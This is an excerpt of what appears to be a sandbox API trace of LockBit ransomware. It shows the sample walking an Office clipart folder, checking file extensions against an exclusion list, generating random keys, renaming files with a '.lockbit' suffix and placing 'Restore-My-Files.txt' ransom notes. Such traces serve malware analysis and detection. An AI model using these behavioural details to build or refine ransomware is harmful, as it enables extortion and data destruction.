[0158.827] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0158.827] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0158.827] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0158.827] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0158.827] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0158.827] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0158.827] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0158.827] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0158.827] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0158.827] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0158.827] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0158.827] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0158.827] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0158.827] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0158.827] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0158.827] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0158.827] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0158.827] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0158.827] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0158.828] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0318448.WMF.lockbit") returned 72 [0158.828] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0318448.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0318448.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0158.829] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0158.830] malloc (_Size=0x40068) returned 0x3df0008 [0158.830] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=16768) returned 1 [0158.830] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.830] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.830] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0158.830] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.831] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.831] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0158.831] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0158.838] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0318448.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0318448.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0158.838] malloc (_Size=0xa6) returned 0x1fa2ed8 [0158.838] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0158.840] free (_Block=0x1fa2ed8) [0158.840] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0318448.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0158.840] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0158.840] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0158.840] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x66188a70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2dfa, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0318804.WMF", cAlternateFileName="")) returned 1 [0158.840] lstrcmpiW (lpString1=".", lpString2="J0318804.WMF") returned -1 [0158.840] lstrcmpiW (lpString1="..", lpString2="J0318804.WMF") returned -1 [0158.840] PathFindExtensionW (pszPath="J0318804.WMF") returned=".WMF" [0158.840] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0158.840] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0158.840] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0158.840] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0158.840] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0158.840] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0158.840] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0158.840] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0158.840] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0158.840] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0158.840] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0158.840] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0158.840] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0158.840] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0158.840] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0158.841] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0158.841] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0158.841] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0158.841] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0158.841] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0158.841] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0158.841] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0158.841] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0158.841] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0158.841] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0158.841] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0158.841] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0158.841] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0158.841] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0158.841] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0158.841] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0158.841] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0158.841] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0158.841] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0158.841] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0158.841] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0158.841] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0158.841] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0158.841] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0158.841] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0158.841] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0158.841] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0158.842] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0158.842] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0158.842] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0158.842] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0158.842] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0158.842] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0318804.WMF") returned 1 [0158.842] lstrcmpiW (lpString1="ntldr", lpString2="J0318804.WMF") returned 1 [0158.842] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0318804.WMF") returned 1 [0158.842] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0318804.WMF") returned -1 [0158.842] lstrcmpiW (lpString1="autorun.inf", lpString2="J0318804.WMF") returned -1 [0158.842] lstrcmpiW (lpString1="thumbs.db", lpString2="J0318804.WMF") returned 1 [0158.842] lstrcmpiW (lpString1="iconcache.db", lpString2="J0318804.WMF") returned -1 [0158.842] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0158.842] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0318804.WMF") returned=".WMF" [0158.842] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0158.842] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0158.842] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0158.842] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0158.842] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0158.842] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0158.842] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0158.842] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0158.842] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0158.842] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0158.842] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0158.842] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0158.843] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0158.843] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0158.843] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0158.843] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0158.843] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0158.843] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0158.843] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0158.843] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0158.843] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0158.843] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0158.843] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0158.843] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0158.843] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0158.843] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0158.843] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0158.843] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0158.843] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0318804.WMF.lockbit") returned 72 [0158.843] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0318804.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0318804.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0158.844] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0158.844] malloc (_Size=0x40068) returned 0x3df0008 [0158.845] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=11770) returned 1 [0158.845] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.845] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.845] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0158.845] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.846] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.846] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0158.846] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0158.850] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0318804.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0318804.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0158.850] malloc (_Size=0xa6) returned 0x1fa2ed8 [0158.850] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0158.851] free (_Block=0x1fa2ed8) [0158.851] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0318804.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0158.851] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0158.851] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0158.851] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x66188a70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x28be, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0318810.WMF", cAlternateFileName="")) returned 1 [0158.852] lstrcmpiW (lpString1=".", lpString2="J0318810.WMF") returned -1 [0158.852] lstrcmpiW (lpString1="..", lpString2="J0318810.WMF") returned -1 [0158.852] PathFindExtensionW (pszPath="J0318810.WMF") returned=".WMF" [0158.852] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0158.852] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0158.852] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0158.852] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0158.852] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0158.852] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0158.852] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0158.852] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0158.852] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0158.852] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0158.852] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0158.852] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0158.852] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0158.852] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0158.852] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0158.852] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0158.852] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0158.852] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0158.852] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0158.852] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0158.852] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0158.853] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0158.853] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0158.853] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0158.853] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0158.853] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0158.853] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0158.853] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0158.853] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0158.853] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0158.853] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0158.853] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0158.853] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0158.853] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0158.853] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0158.853] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0158.853] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0158.853] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0158.853] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0158.853] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0158.853] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0158.853] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0158.853] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0158.853] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0158.853] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0158.853] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0158.854] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0158.854] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0318810.WMF") returned 1 [0158.854] lstrcmpiW (lpString1="ntldr", lpString2="J0318810.WMF") returned 1 [0158.854] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0318810.WMF") returned 1 [0158.854] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0318810.WMF") returned -1 [0158.854] lstrcmpiW (lpString1="autorun.inf", lpString2="J0318810.WMF") returned -1 [0158.854] lstrcmpiW (lpString1="thumbs.db", lpString2="J0318810.WMF") returned 1 [0158.854] lstrcmpiW (lpString1="iconcache.db", lpString2="J0318810.WMF") returned -1 [0158.854] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0158.854] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0318810.WMF") returned=".WMF" [0158.854] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0158.854] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0158.854] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0158.854] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0158.854] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0158.854] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0158.854] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0158.854] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0158.854] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0158.854] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0158.854] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0158.854] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0158.854] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0158.854] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0158.854] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0158.855] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0158.855] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0158.855] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0158.855] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0158.855] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0158.855] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0158.855] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0158.855] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0158.855] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0158.855] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0158.855] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0158.855] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0158.855] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0158.855] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0318810.WMF.lockbit") returned 72 [0158.855] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0318810.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0318810.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0158.856] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0158.856] malloc (_Size=0x40068) returned 0x1ff1e60 [0158.856] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=10430) returned 1 [0158.856] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.857] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.857] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0158.857] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.858] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.858] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0158.858] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0158.863] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0318810.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0318810.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0158.863] malloc (_Size=0xa6) returned 0x1fa2ed8 [0158.863] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0158.864] free (_Block=0x1fa2ed8) [0158.864] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0318810.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0158.864] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0158.864] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0158.864] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x66188a70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x24d7, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0321179.JPG", cAlternateFileName="")) returned 1 [0158.864] lstrcmpiW (lpString1=".", lpString2="J0321179.JPG") returned -1 [0158.864] lstrcmpiW (lpString1="..", lpString2="J0321179.JPG") returned -1 [0158.865] PathFindExtensionW (pszPath="J0321179.JPG") returned=".JPG" [0158.865] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0158.865] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0158.865] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0158.865] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0158.865] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0158.865] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0158.865] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0158.865] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0158.865] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0158.865] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0158.865] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0158.865] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0158.865] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0158.865] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0158.865] lstrcmpiW (lpString1=".mpa", 